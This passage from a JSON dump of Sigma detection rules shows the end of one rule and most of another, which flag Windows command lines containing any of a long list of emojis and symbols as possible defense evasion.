'🎖'\n            - '🏵'\n            - '🎗'\n            - '🎫'\n            - '🎟'\n            - '🎪'\n            - '🤹'\n            - '🤹‍♂️'\n            - '🤹‍♀️'\n            - '🎭'\n            - '🩰'\n            - '🎨'\n            - '🎬'\n            - '🎤'\n            - '🎧'\n            - '🎼'\n            - '🎹'\n            - '🥁'\n            - '🪘'\n            - '🎷'\n            - '🎺'\n            - '🪗'\n            - '🎸'\n            - '🪕'\n            - '🎻'\n            - '🎲'\n            - '♟'\n            - '🎯'\n            - '🎳'\n            - '🎮'\n            - '🎰'\n            - '🧩'\n            - '🚗'\n            - '🚕'\n            - '🚙'\n            - '🚌'\n            - '🚎'\n            - '🏎'\n            - '🚓'\n            - '🚑'\n            - '🚒'\n            - '🚐'\n            - '🛻'\n            - '🚚'\n            - '🚛'\n            - '🚜'\n            - '🦯'\n            - '🦽'\n            - '🦼'\n            - '🛴'\n            - '🚲'\n            - '🛵'\n            - '🏍'\n            - '🛺'\n            - '🚨'\n            - '🚔'\n            - '🚍'\n            - '🚘'\n            - '🚖'\n            - '🛞'\n            - '🚡'\n            - '🚠'\n            - '🚟'\n            - '🚃'\n            - '🚋'\n            - '🚞'\n            - '🚝'\n            - '🚄'\n            - '🚅'\n            - '🚈'\n            - '🚂'\n            - '🚆'\n            - '🚇'\n            - '🚊'\n            - '🚉'\n            - '✈️'\n            - '🛫'\n            - '🛬'\n            - '🛩'\n            - '💺'\n            - '🛰'\n            - '🚀'\n            - '🛸'\n            - '🚁'\n            - '🛶'\n            - '⛵️'\n            - '🚤'\n            - '🛥'\n            - '🛳'\n            - '⛴'\n            - '🚢'\n            - '⚓️'\n            - '🛟'\n            - '🪝'\n            - '⛽️'\n            - '🚧'\n            - '🚦'\n            - '🚥'\n            - '🚏'\n            - '🗺'\n            - '🗿'\n            - '🗽'\n            - '🗼'\n            - '🏰'\n            - '🏯'\n         
   - '🏟'\n            - '🎡'\n            - '🎢'\n            - '🛝'\n            - '🎠'\n            - '⛲️'\n            - '⛱'\n            - '🏖'\n            - '🏝'\n            - '🏜'\n            - '🌋'\n            - '⛰'\n            - '🏔'\n            - '🗻'\n            - '🏕'\n            - '⛺️'\n            - '🛖'\n            - '🏠'\n            - '🏡'\n            - '🏘'\n            - '🏚'\n            - '🏗'\n            - '🏭'\n            - '🏢'\n            - '🏬'\n            - '🏣'\n            - '🏤'\n            - '🏥'\n            - '🏦'\n            - '🏨'\n            - '🏪'\n            - '🏫'\n            - '🏩'\n            - '💒'\n            - '🏛'\n            - '⛪️'\n            - '🕌'\n            - '🕍'\n            - '🛕'\n            - '🕋'\n            - '⛩'\n            - '🛤'\n            - '🛣'\n            - '🗾'\n            - '🎑'\n            - '🏞'\n            - '🌅'\n            - '🌄'\n            - '🌠'\n            - '🎇'\n            - '🎆'\n            - '🌇'\n            - '🌆'\n            - '🏙'\n            - '🌃'\n            - '🌌'\n            - '🌉'\n            - '🌁'\n            - '⌚️'\n            - '📱'\n            - '📲'\n            - '💻'\n            - '⌨️'\n            - '🖥'\n            - '🖨'\n            - '🖱'\n            - '🖲'\n            - '🕹'\n            - '🗜'\n            - '💽'\n            - '💾'\n            - '💿'\n            - '📀'\n            - '📼'\n            - '📷'\n            - '📸'\n            - '📹'\n            - '🎥'\n            - '📽'\n            - '🎞'\n            - '📞'\n            - '☎️'\n            - '📟'\n            - '📠'\n            - '📺'\n            - '📻'\n            - '🎙'\n            - '🎚'\n            - '🎛'\n            - '🧭'\n            - '⏱'\n            - '⏲'\n            - '⏰'\n            - '🕰'\n            - '⌛️'\n            - '⏳'\n            - '📡'\n            - '🔋'\n            - '🪫'\n            - '🔌'\n            - '💡'\n            - '🔦'\n            - '🕯'\n            - '🪔'\n            - '🧯'\n       
     - '🛢'\n            - '💸'\n            - '💵'\n            - '💴'\n            - '💶'\n            - '💷'\n            - '🪙'\n            - '💰'\n            - '💳'\n            - '💎'\n            - '⚖️'\n            - '🪜'\n            - '🧰'\n            - '🪛'\n            - '🔧'\n            - '🔨'\n            - '⚒'\n            - '🛠'\n            - '⛏'\n            - '🪚'\n            - '🔩'\n            - '⚙️'\n            - '🪤'\n            - '🧱'\n            - '⛓'\n            - '🧲'\n            - '🔫'\n            - '💣'\n            - '🧨'\n            - '🪓'\n            - '🔪'\n            - '🗡'\n            - '⚔️'\n            - '🛡'\n            - '🚬'\n            - '⚰️'\n            - '🪦'\n            - '⚱️'\n            - '🏺'\n            - '🔮'\n            - '📿'\n            - '🧿'\n            - '🪬'\n            - '💈'\n            - '⚗️'\n            - '🔭'\n            - '🔬'\n            - '🕳'\n            - '🩹'\n            - '🩺'\n            - '🩻'\n            - '🩼'\n            - '💊'\n            - '💉'\n            - '🩸'\n            - '🧬'\n            - '🦠'\n            - '🧫'\n            - '🧪'\n            - '🌡'\n            - '🧹'\n            - '🪠'\n            - '🧺'\n            - '🧻'\n            - '🚽'\n            - '🚰'\n            - '🚿'\n            - '🛁'\n            - '🛀'\n            - '🧼'\n            - '🪥'\n            - '🪒'\n            - '🧽'\n            - '🪣'\n            - '🧴'\n            - '🛎'\n            - '🔑'\n            - '🗝'\n            - '🚪'\n            - '🪑'\n            - '🛋'\n            - '🛏'\n            - '🛌'\n            - '🧸'\n            - '🪆'\n            - '🖼'\n            - '🪞'\n            - '🪟'\n            - '🛍'\n            - '🛒'\n            - '🎁'\n            - '🎈'\n            - '🎏'\n            - '🎀'\n            - '🪄'\n            - '🪅'\n            - '🎊'\n            - '🎉'\n            - '🪩'\n            - '🎎'\n            - '🏮'\n            - '🎐'\n            - '🧧'\n            - '✉️'\n            - '📩'\n     
       - '📨'\n            - '📧'\n            - '💌'\n            - '📥'\n            - '📤'\n            - '📦'\n            - '🏷'\n            - '🪧'\n            - '📪'\n            - '📫'\n            - '📬'\n            - '📭'\n            - '📮'\n            - '📯'\n            - '📜'\n            - '📃'\n            - '📄'\n            - '📑'\n            - '🧾'\n            - '📊'\n            - '📈'\n            - '📉'\n            - '🗒'\n            - '🗓'\n            - '📆'\n            - '📅'\n            - '🗑'\n            - '🪪'\n            - '📇'\n            - '🗃'\n            - '🗳'\n            - '🗄'\n            - '📋'\n            - '📁'\n            - '📂'\n            - '🗂'\n            - '🗞'\n            - '📰'\n            - '📓'\n            - '📔'\n            - '📒'\n            - '📕'\n            - '📗'\n            - '📘'\n            - '📙'\n            - '📚'\n            - '📖'\n            - '🔖'\n            - '🧷'\n            - '🔗'\n            - '📎'\n            - '🖇'\n            - '📐'\n            - '📏'\n            - '🧮'\n            - '📌'\n            - '📍'\n            - '✂️'\n            - '🖊'\n            - '🖋'\n            - '✒️'\n            - '🖌'\n            - '🖍'\n            - '📝'\n            - '✏️'\n            - '🔍'\n            - '🔎'\n            - '🔏'\n            - '🔐'\n            - '🔒'\n            - '🔓❤️'\n            - '🧡'\n            - '💛'\n            - '💚'\n            - '💙'\n            - '💜'\n            - '🖤'\n            - '🤍'\n            - '🤎'\n            - '❤️‍🔥'\n            - '❤️‍🩹'\n            - '💔'\n            - '❣️'\n            - '💕'\n            - '💞'\n            - '💓'\n            - '💗'\n            - '💖'\n            - '💘'\n            - '💝'\n            - '💟'\n            - '☮️'\n            - '✝️'\n            - '☪️'\n            - '🕉'\n            - '☸️'\n            - '✡️'\n            - '🔯'\n            - '🕎'\n            - '☯️'\n            - '☦️'\n            - '🛐'\n            - '⛎'\n            - '♈️'\n         
   - '♉️'\n            - '♊️'\n            - '♋️'\n            - '♌️'\n            - '♍️'\n            - '♎️'\n            - '♏️'\n            - '♐️'\n            - '♑️'\n            - '♒️'\n            - '♓️'\n            - '🆔'\n            - '⚛️'\n            - '🉑'\n            - '☢️'\n            - '☣️'\n            - '📴'\n            - '📳'\n            - '🈶'\n            - '🈚️'\n            - '🈸'\n            - '🈺'\n            - '🈷️'\n            - '✴️'\n            - '🆚'\n            - '💮'\n            - '🉐'\n            - '㊙️'\n            - '㊗️'\n            - '🈴'\n            - '🈵'\n            - '🈹'\n            - '🈲'\n            - '🅰️'\n            - '🅱️'\n            - '🆎'\n            - '🆑'\n            - '🅾️'\n            - '🆘'\n            - '❌'\n            - '⭕️'\n            - '🛑'\n            - '⛔️'\n            - '📛'\n            - '🚫'\n            - '💯'\n            - '💢'\n            - '♨️'\n            - '🚷'\n            - '🚯'\n            - '🚳'\n            - '🚱'\n            - '🔞'\n            - '📵'\n            - '🚭'\n            - '❗️'\n            - '❕'\n            - '❓'\n            - '❔'\n            - '‼️'\n            - '⁉️'\n            - '🔅'\n            - '🔆'\n            - '〽️'\n            - '⚠️'\n            - '🚸'\n            - '🔱'\n            - '⚜️'\n            - '🔰'\n            - '♻️'\n            - '✅'\n            - '🈯️'\n            - '💹'\n            - '❇️'\n            - '✳️'\n            - '❎'\n            - '🌐'\n            - '💠'\n            - 'Ⓜ️'\n            - '🌀'\n            - '💤'\n            - '🏧'\n            - '🚾'\n            - '♿️'\n            - '🅿️'\n            - '🛗'\n            - '🈳'\n            - '🈂️'\n            - '🛂'\n            - '🛃'\n            - '🛄'\n            - '🛅'\n            - '🚹'\n            - '🚺'\n            - '🚼'\n            - '⚧'\n            - '🚻'\n            - '🚮'\n            - '🎦'\n            - '📶'\n            - '🈁'\n            - '🔣'\n            - 'ℹ️'\n            
- '🔤'\n            - '🔡'\n            - '🔠'\n            - '🆖'\n            - '🆗'\n            - '🆙'\n            - '🆒'\n            - '🆕'\n            - '🆓'\n            - '0️⃣'\n            - '1️⃣'\n            - '2️⃣'\n            - '3️⃣'\n            - '4️⃣'\n            - '5️⃣'\n            - '6️⃣'\n            - '7️⃣'\n            - '8️⃣'\n            - '9️⃣'\n            - '🔟'\n            - '🔢'\n            - '#️⃣'\n            - '*️⃣'\n            - '⏏️'\n            - '▶️'\n            - '⏸'\n            - '⏯'\n            - '⏹'\n            - '⏺'\n            - '⏭'\n            - '⏮'\n            - '⏩'\n            - '⏪'\n            - '⏫'\n            - '⏬'\n            - '◀️'\n            - '🔼'\n            - '🔽'\n            - '➡️'\n            - '⬅️'\n            - '⬆️'\n            - '⬇️'\n            - '↗️'\n            - '↘️'\n            - '↙️'\n            - '↖️'\n            - '↕️'\n            - '↔️'\n            - '↪️'\n            - '↩️'\n            - '⤴️'\n            - '⤵️'\n            - '🔀'\n            - '🔁'\n            - '🔂'\n            - '🔄'\n            - '🔃'\n            - '🎵'\n            - '🎶'\n            - '➕'\n            - '➖'\n            - '➗'\n            - '✖️'\n            - '🟰'\n            - '♾'\n            - '💲'\n            - '💱'\n            - '™️'\n            - '©️'\n            - '®️'\n            - '〰️'\n            - '➰'\n            - '➿'\n            - '🔚'\n            - '🔙'\n            - '🔛'\n            - '🔝'\n            - '🔜'\n            - '✔️'\n            - '☑️'\n            - '🔘'\n            - '🔴'\n            - '🟠'\n            - '🟡'\n            - '🟢'\n            - '🔵'\n            - '🟣'\n            - '⚫️'\n            - '⚪️'\n            - '🟤'\n            - '🔺'\n            - '🔻'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_4.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4\nid: 225274c4-8dd1-40db-9e09-71dff4f6fb3c\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '🔸'\n            - '🔹'\n            - '🔶'\n            - '🔷'\n            - '🔳'\n            - '🔲'\n            - '▪️'\n            - '▫️'\n            - '◾️'\n            - '◽️'\n            - '◼️'\n            - '◻️'\n            - '🟥'\n            - '🟧'\n            - '🟨'\n            - '🟩'\n            - '🟦'\n            - '🟪'\n            - '⬛️'\n            - '⬜️'\n            - '🟫'\n            - '🔈'\n            - '🔇'\n            - '🔉'\n            - '🔊'\n            - '🔔'\n            - '🔕'\n            - '📣'\n            - '📢'\n            - '👁‍🗨'\n            - '💬'\n            - '💭'\n            - '🗯'\n            - '♠️'\n            - '♣️'\n            - '♥️'\n            - '♦️'\n            - '🃏'\n            - '🎴'\n            - '🀄️'\n            - '🕐'\n            - '🕑'\n            - '🕒'\n            - '🕓'\n            - '🕔'\n            - '🕕'\n            - '🕖'\n            - '🕗'\n            - '🕘'\n            - '🕙'\n            - '🕚'\n            - '🕛'\n            - '🕜'\n            - '🕝'\n            - '🕞'\n            - '🕟'\n            - '🕠'\n            - '🕡'\n            - '🕢'\n            - '🕣'\n            - '🕤'\n            - '🕥'\n            - '🕦'\n            - '🕧✢'\n            - '✣'\n            - '✤'\n            - '✥'\n            - '✦'\n            - '✧'\n            - '★'\n            - '☆'\n            - '✯'\n            - '✡︎'\n            - '✩'\n            - '✪'\n            - '✫'\n         
   - '✬'\n            - '✭'\n            - '✮'\n            - '✶'\n            - '✷'\n            - '✵'\n            - '✸'\n            - '✹'\n            - '→'\n            - '⇒'\n            - '⟹'\n            - '⇨'\n            - '⇾'\n            - '➾'\n            - '⇢'\n            - '☛'\n            - '☞'\n            - '➔'\n            - '➜'\n            - '➙'\n            - '➛'\n            - '➝'\n            - '➞'\n            - '♠︎'\n            - '♣︎'\n            - '♥︎'\n            - '♦︎'\n            - '♤'\n            - '♧'\n            - '♡'\n            - '♢'\n            - '♚'\n            - '♛'\n            - '♜'\n            - '♝'\n            - '♞'\n            - '♟'\n            - '♔'\n            - '♕'\n            - '♖'\n            - '♗'\n            - '♘'\n            - '♙'\n            - '⚀'\n            - '⚁'\n            - '⚂'\n            - '⚃'\n            - '⚄'\n            - '⚅'\n            - '🂠'\n            - '⚈'\n            - '⚉'\n            - '⚆'\n            - '⚇'\n            - '𓀀'\n            - '𓀁'\n            - '𓀂'\n            - '𓀃'\n            - '𓀄'\n            - '𓀅'\n            - '𓀆'\n            - '𓀇'\n            - '𓀈'\n            - '𓀉'\n            - '𓀊'\n            - '𓀋'\n            - '𓀌'\n            - '𓀍'\n            - '𓀎'\n            - '𓀏'\n            - '𓀐'\n            - '𓀑'\n            - '𓀒'\n            - '𓀓'\n            - '𓀔'\n            - '𓀕'\n            - '𓀖'\n            - '𓀗'\n            - '𓀘'\n            - '𓀙'\n            - '𓀚'\n            - '𓀛'\n            - '𓀜'\n            - '𓀝🏳️'\n            - '🏴'\n            - '🏁'\n            - '🚩'\n            - '🏳️‍🌈'\n            - '🏳️‍⚧️'\n            - '🏴‍☠️'\n            - '🇦🇫'\n            - '🇦🇽'\n            - '🇦🇱'\n            - '🇩🇿'\n            - '🇦🇸'\n            - '🇦🇩'\n            - '🇦🇴'\n            - '🇦🇮'\n            - '🇦🇶'\n            - '🇦🇬'\n            - '🇦🇷'\n            - '🇦🇲'\n            - '🇦🇼'\n            - '🇦🇺'\n   
         - '🇦🇹'\n            - '🇦🇿'\n            - '🇧🇸'\n            - '🇧🇭'\n            - '🇧🇩'\n            - '🇧🇧'\n            - '🇧🇾'\n            - '🇧🇪'\n            - '🇧🇿'\n            - '🇧🇯'\n            - '🇧🇲'\n            - '🇧🇹'\n            - '🇧🇴'\n            - '🇧🇦'\n            - '🇧🇼'\n            - '🇧🇷'\n            - '🇮🇴'\n            - '🇻🇬'\n            - '🇧🇳'\n            - '🇧🇬'\n            - '🇧🇫'\n            - '🇧🇮'\n            - '🇰🇭'\n            - '🇨🇲'\n            - '🇨🇦'\n            - '🇮🇨'\n            - '🇨🇻'\n            - '🇧🇶'\n            - '🇰🇾'\n            - '🇨🇫'\n            - '🇹🇩'\n            - '🇨🇱'\n            - '🇨🇳'\n            - '🇨🇽'\n            - '🇨🇨'\n            - '🇨🇴'\n            - '🇰🇲'\n            - '🇨🇬'\n            - '🇨🇩'\n            - '🇨🇰'\n            - '🇨🇷'\n            - '🇨🇮'\n            - '🇭🇷'\n            - '🇨🇺'\n            - '🇨🇼'\n            - '🇨🇾'\n            - '🇨🇿'\n            - '🇩🇰'\n            - '🇩🇯'\n            - '🇩🇲'\n            - '🇩🇴'\n            - '🇪🇨'\n            - '🇪🇬'\n            - '🇸🇻'\n            - '🇬🇶'\n            - '🇪🇷'\n            - '🇪🇪'\n            - '🇪🇹'\n            - '🇪🇺'\n            - '🇫🇰'\n            - '🇫🇴'\n            - '🇫🇯'\n            - '🇫🇮'\n            - '🇫🇷'\n            - '🇬🇫'\n            - '🇵🇫'\n            - '🇹🇫'\n            - '🇬🇦'\n            - '🇬🇲'\n            - '🇬🇪'\n            - '🇩🇪'\n            - '🇬🇭'\n            - '🇬🇮'\n            - '🇬🇷'\n            - '🇬🇱'\n            - '🇬🇩'\n            - '🇬🇵'\n            - '🇬🇺'\n            - '🇬🇹'\n            - '🇬🇬'\n            - '🇬🇳'\n            - '🇬🇼'\n            - '🇬🇾'\n            - '🇭🇹'\n            - '🇭🇳'\n            - '🇭🇰'\n            - '🇭🇺'\n            - '🇮🇸'\n            - '🇮🇳'\n            - '🇮🇩'\n            - '🇮🇷'\n            - '🇮🇶'\n            - '🇮🇪'\n            - '🇮🇲'\n            - '🇮🇱'\n            - '🇮🇹'\n            - '🇯🇲'\n            - '🇯🇵'\n            - '🎌'\n            - '🇯🇪'\n    
        - '🇯🇴'\n            - '🇰🇿'\n            - '🇰🇪'\n            - '🇰🇮'\n            - '🇽🇰'\n            - '🇰🇼'\n            - '🇰🇬'\n            - '🇱🇦'\n            - '🇱🇻'\n            - '🇱🇧'\n            - '🇱🇸'\n            - '🇱🇷'\n            - '🇱🇾'\n            - '🇱🇮'\n            - '🇱🇹'\n            - '🇱🇺'\n            - '🇲🇴'\n            - '🇲🇰'\n            - '🇲🇬'\n            - '🇲🇼'\n            - '🇲🇾'\n            - '🇲🇻'\n            - '🇲🇱'\n            - '🇲🇹'\n            - '🇲🇭'\n            - '🇲🇶'\n            - '🇲🇷'\n            - '🇲🇺'\n            - '🇾🇹'\n            - '🇲🇽'\n            - '🇫🇲'\n            - '🇲🇩'\n            - '🇲🇨'\n            - '🇲🇳'\n            - '🇲🇪'\n            - '🇲🇸'\n            - '🇲🇦'\n            - '🇲🇿'\n            - '🇲🇲'\n            - '🇳🇦'\n            - '🇳🇷'\n            - '🇳🇵'\n            - '🇳🇱'\n            - '🇳🇨'\n            - '🇳🇿'\n            - '🇳🇮'\n            - '🇳🇪'\n            - '🇳🇬'\n            - '🇳🇺'\n            - '🇳🇫'\n            - '🇰🇵'\n            - '🇲🇵'\n            - '🇳🇴'\n            - '🇴🇲'\n            - '🇵🇰'\n            - '🇵🇼'\n            - '🇵🇸'\n            - '🇵🇦'\n            - '🇵🇬'\n            - '🇵🇾'\n            - '🇵🇪'\n            - '🇵🇭'\n            - '🇵🇳'\n            - '🇵🇱'\n            - '🇵🇹'\n            - '🇵🇷'\n            - '🇶🇦'\n            - '🇷🇪'\n            - '🇷🇴'\n            - '🇷🇺'\n            - '🇷🇼'\n            - '🇼🇸'\n            - '🇸🇲'\n            - '🇸🇦'\n            - '🇸🇳'\n            - '🇷🇸'\n            - '🇸🇨'\n            - '🇸🇱'\n            - '🇸🇬'\n            - '🇸🇽'\n            - '🇸🇰'\n            - '🇸🇮'\n            - '🇬🇸'\n            - '🇸🇧'\n            - '🇸🇴'\n            - '🇿🇦'\n            - '🇰🇷'\n            - '🇸🇸'\n            - '🇪🇸'\n            - '🇱🇰'\n            - '🇧🇱'\n            - '🇸🇭'\n            - '🇰🇳'\n            - '🇱🇨'\n            - '🇵🇲'\n            - '🇻🇨'\n            - '🇸🇩'\n            - '🇸🇷'\n            - '🇸🇿'\n            - '🇸🇪'\n    
        - '🇨🇭'\n            - '🇸🇾'\n            - '🇹🇼'\n            - '🇹🇯'\n            - '🇹🇿'\n            - '🇹🇭'\n            - '🇹🇱'\n            - '🇹🇬'\n            - '🇹🇰'\n            - '🇹🇴'\n            - '🇹🇹'\n            - '🇹🇳'\n            - '🇹🇷'\n            - '🇹🇲'\n            - '🇹🇨'\n            - '🇹🇻'\n            - '🇻🇮'\n            - '🇺🇬'\n            - '🇺🇦'\n            - '🇦🇪'\n            - '🇬🇧'\n            - '🏴󠁧󠁢󠁥󠁮󠁧󠁿'\n            - '🏴󠁧󠁢󠁳󠁣󠁴󠁿'\n            - '🏴󠁧󠁢󠁷󠁬󠁳󠁿'\n            - '🇺🇳'\n            - '🇺🇸'\n            - '🇺🇾'\n            - '🇺🇿'\n            - '🇻🇺'\n            - '🇻🇦'\n            - '🇻🇪'\n            - '🇻🇳'\n            - '🇼🇫'\n            - '🇪🇭'\n            - '🇾🇪'\n            - '🇿🇲'\n            - '🇿🇼🫠'\n            - '🫢'\n            - '🫣'\n            - '🫡'\n            - '🫥'\n            - '🫤'\n            - '🥹'\n            - '🫱'\n            - '🫱🏻'\n            - '🫱🏼'\n            - '🫱🏽'\n            - '🫱🏾'\n            - '🫱🏿'\n            - '🫲'\n            - '🫲🏻'\n            - '🫲🏼'\n            - '🫲🏽'\n            - '🫲🏾'\n            - '🫲🏿'\n            - '🫳'\n            - '🫳🏻'\n            - '🫳🏼'\n            - '🫳🏽'\n            - '🫳🏾'\n            - '🫳🏿'\n            - '🫴'\n            - '🫴🏻'\n            - '🫴🏼'\n            - '🫴🏽'\n            - '🫴🏾'\n            - '🫴🏿'\n            - '🫰'\n            - '🫰🏻'\n            - '🫰🏼'\n            - '🫰🏽'\n            - '🫰🏾'\n            - '🫰🏿'\n            - '🫵'\n            - '🫵🏻'\n            - '🫵🏼'\n            - '🫵🏽'\n            - '🫵🏾'\n            - '🫵🏿'\n            - '🫶'\n            - '🫶🏻'\n            - '🫶🏼'\n            - '🫶🏽'\n            - '🫶🏾'\n            - '🫶🏿'\n            - '🤝🏻'\n            - '🤝🏼'\n            - '🤝🏽'\n            - '🤝🏾'\n            - '🤝🏿'\n            - '🫱🏻‍🫲🏼'\n            - '🫱🏻‍🫲🏽'\n            - '🫱🏻‍🫲🏾'\n            - '🫱🏻‍🫲🏿'\n            - '🫱🏼‍🫲🏻'\n            - '🫱🏼‍🫲🏽'\n            - '🫱🏼‍🫲🏾'\n            - '🫱🏼‍🫲🏿'\n            - 
'🫱🏽‍🫲🏻'\n            - '🫱🏽‍🫲🏼'\n            - '🫱🏽‍🫲🏾'\n            - '🫱🏽‍🫲🏿'\n            - '🫱🏾‍🫲🏻'\n            - '🫱🏾‍🫲🏼'\n            - '🫱🏾‍🫲🏽'\n            - '🫱🏾‍🫲🏿'\n            - '🫱🏿‍🫲🏻'\n            - '🫱🏿‍🫲🏼'\n            - '🫱🏿‍🫲🏽'\n            - '🫱🏿‍🫲🏾'\n            - '🫦'\n            - '🫅'\n            - '🫅🏻'\n            - '🫅🏼'\n            - '🫅🏽'\n            - '🫅🏾'\n            - '🫅🏿'\n            - '🫃'\n            - '🫃🏻'\n            - '🫃🏼'\n            - '🫃🏽'\n            - '🫃🏾'\n            - '🫃🏿'\n            - '🫄'\n            - '🫄🏻'\n            - '🫄🏼'\n            - '🫄🏽'\n            - '🫄🏾'\n            - '🫄🏿'\n            - '🧌'\n            - '🪸'\n            - '🪷'\n            - '🪹'\n            - '🪺'\n            - '🫘'\n            - '🫗'\n            - '🫙'\n            - '🛝'\n            - '🛞'\n            - '🛟'\n            - '🪬'\n            - '🪩'\n            - '🪫'\n            - '🩼'\n            - '🩻'\n            - '🫧'\n            - '🪪'\n            - '🟰'\n            - '😮‍💨'\n            - '😵‍💫'\n            - '😶‍🌫️'\n            - '❤️‍🔥'\n            - '❤️‍🩹'\n            - '🧔‍♀️'\n            - '🧔🏻‍♀️'\n            - '🧔🏼‍♀️'\n            - '🧔🏽‍♀️'\n            - '🧔🏾‍♀️'\n            - '🧔🏿‍♀️'\n            - '🧔‍♂️'\n            - '🧔🏻‍♂️'\n            - '🧔🏼‍♂️'\n            - '🧔🏽‍♂️'\n            - '🧔🏾‍♂️'\n            - '🧔🏿‍♂️'\n            - '💑🏻'\n            - '💑🏼'\n            - '💑🏽'\n            - '💑🏾'\n            - '💑🏿'\n            - '💏🏻'\n            - '💏🏼'\n            - '💏🏽'\n            - '💏🏾'\n            - '💏🏿'\n            - '👨🏻‍❤️‍👨🏻'\n            - '👨🏻‍❤️‍👨🏼'\n            - '👨🏻‍❤️‍👨🏽'\n            - '👨🏻‍❤️‍👨🏾'\n            - '👨🏻‍❤️‍👨🏿'\n            - '👨🏼‍❤️‍👨🏻'\n            - '👨🏼‍❤️‍👨🏼'\n            - '👨🏼‍❤️‍👨🏽'\n            - '👨🏼‍❤️‍👨🏾'\n            - '👨🏼‍❤️‍👨🏿'\n            - '👨🏽‍❤️‍👨🏻'\n            - '👨🏽‍❤️‍👨🏼'\n            - '👨🏽‍❤️‍👨🏽'\n            - '👨🏽‍❤️‍👨🏾'\n            - '👨🏽‍❤️‍👨🏿'\n            - '👨🏾‍❤️‍👨🏻'\n   
         - '👨🏾‍❤️‍👨🏼'\n            - '👨🏾‍❤️‍👨🏽'\n            - '👨🏾‍❤️‍👨🏾'\n            - '👨🏾‍❤️‍👨🏿'\n            - '👨🏿‍❤️‍👨🏻'\n            - '👨🏿‍❤️‍👨🏼'\n            - '👨🏿‍❤️‍👨🏽'\n            - '👨🏿‍❤️‍👨🏾'\n            - '👨🏿‍❤️‍👨🏿'\n            - '👩🏻‍❤️‍👨🏻'\n            - '👩🏻‍❤️‍👨🏼'\n            - '👩🏻‍❤️‍👨🏽'\n            - '👩🏻‍❤️‍👨🏾'\n            - '👩🏻‍❤️‍👨🏿'\n            - '👩🏻‍❤️‍👩🏻'\n            - '👩🏻‍❤️‍👩🏼'\n            - '👩🏻‍❤️‍👩🏽'\n            - '👩🏻‍❤️‍👩🏾'\n            - '👩🏻‍❤️‍👩🏿'\n            - '👩🏼‍❤️‍👨🏻'\n            - '👩🏼‍❤️‍👨🏼'\n            - '👩🏼‍❤️‍👨🏽'\n            - '👩🏼‍❤️‍👨🏾'\n            - '👩🏼‍❤️‍👨🏿'\n            - '👩🏼‍❤️‍👩🏻'\n            - '👩🏼‍❤️‍👩🏼'\n            - '👩🏼‍❤️‍👩🏽'\n            - '👩🏼‍❤️‍👩🏾'\n            - '👩🏼‍❤️‍👩🏿'\n            - '👩🏽‍❤️‍👨🏻'\n            - '👩🏽‍❤️‍👨🏼'\n            - '👩🏽‍❤️‍👨🏽'\n            - '👩🏽‍❤️‍👨🏾'\n            - '👩🏽‍❤️‍👨🏿'\n            - '👩🏽‍❤️‍👩🏻'\n            - '👩🏽‍❤️‍👩🏼'\n            - '👩🏽‍❤️‍👩🏽'\n            - '👩🏽‍❤️‍👩🏾'\n            - '👩🏽‍❤️‍👩🏿'\n            - '👩🏾‍❤️‍👨🏻'\n            - '👩🏾‍❤️‍👨🏼'\n            - '👩🏾‍❤️‍👨🏽'\n            - '👩🏾‍❤️‍👨🏾'\n            - '👩🏾‍❤️‍👨🏿'\n            - '👩🏾‍❤️‍👩🏻'\n            - '👩🏾‍❤️‍👩🏼'\n            - '👩🏾‍❤️‍👩🏽'\n            - '👩🏾‍❤️‍👩🏾'\n            - '👩🏾‍❤️‍👩🏿'\n            - '👩🏿‍❤️‍👨🏻'\n            - '👩🏿‍❤️‍👨🏼'\n            - '👩🏿‍❤️‍👨🏽'\n            - '👩🏿‍❤️‍👨🏾'\n            - '👩🏿‍❤️‍👨🏿'\n            - '👩🏿‍❤️‍👩🏻'\n            - '👩🏿‍❤️‍👩🏼'\n            - '👩🏿‍❤️‍👩🏽'\n            - '👩🏿‍❤️‍👩🏾'\n            - '👩🏿‍❤️‍👩🏿'\n            - '🧑🏻‍❤️‍🧑🏼'\n            - '🧑🏻‍❤️‍🧑🏽'\n            - '🧑🏻‍❤️‍🧑🏾'\n            - '🧑🏻‍❤️‍🧑🏿'\n            - '🧑🏼‍❤️‍🧑🏻'\n            - '🧑🏼‍❤️‍🧑🏽'\n            - '🧑🏼‍❤️‍🧑🏾'\n            - '🧑🏼‍❤️‍🧑🏿'\n            - '🧑🏽‍❤️‍🧑🏻'\n            - '🧑🏽‍❤️‍🧑🏼'\n            - '🧑🏽‍❤️‍🧑🏾'\n            - '🧑🏽‍❤️‍🧑🏿'\n            - '🧑🏾‍❤️‍🧑🏻'\n            - '🧑🏾‍❤️‍🧑🏼'\n            - '🧑🏾‍❤️‍🧑🏽'\n            - '🧑🏾‍❤️‍🧑🏿'\n            - '🧑🏿‍❤️‍🧑🏻'\n            - '🧑🏿‍❤️‍🧑🏼'\n 
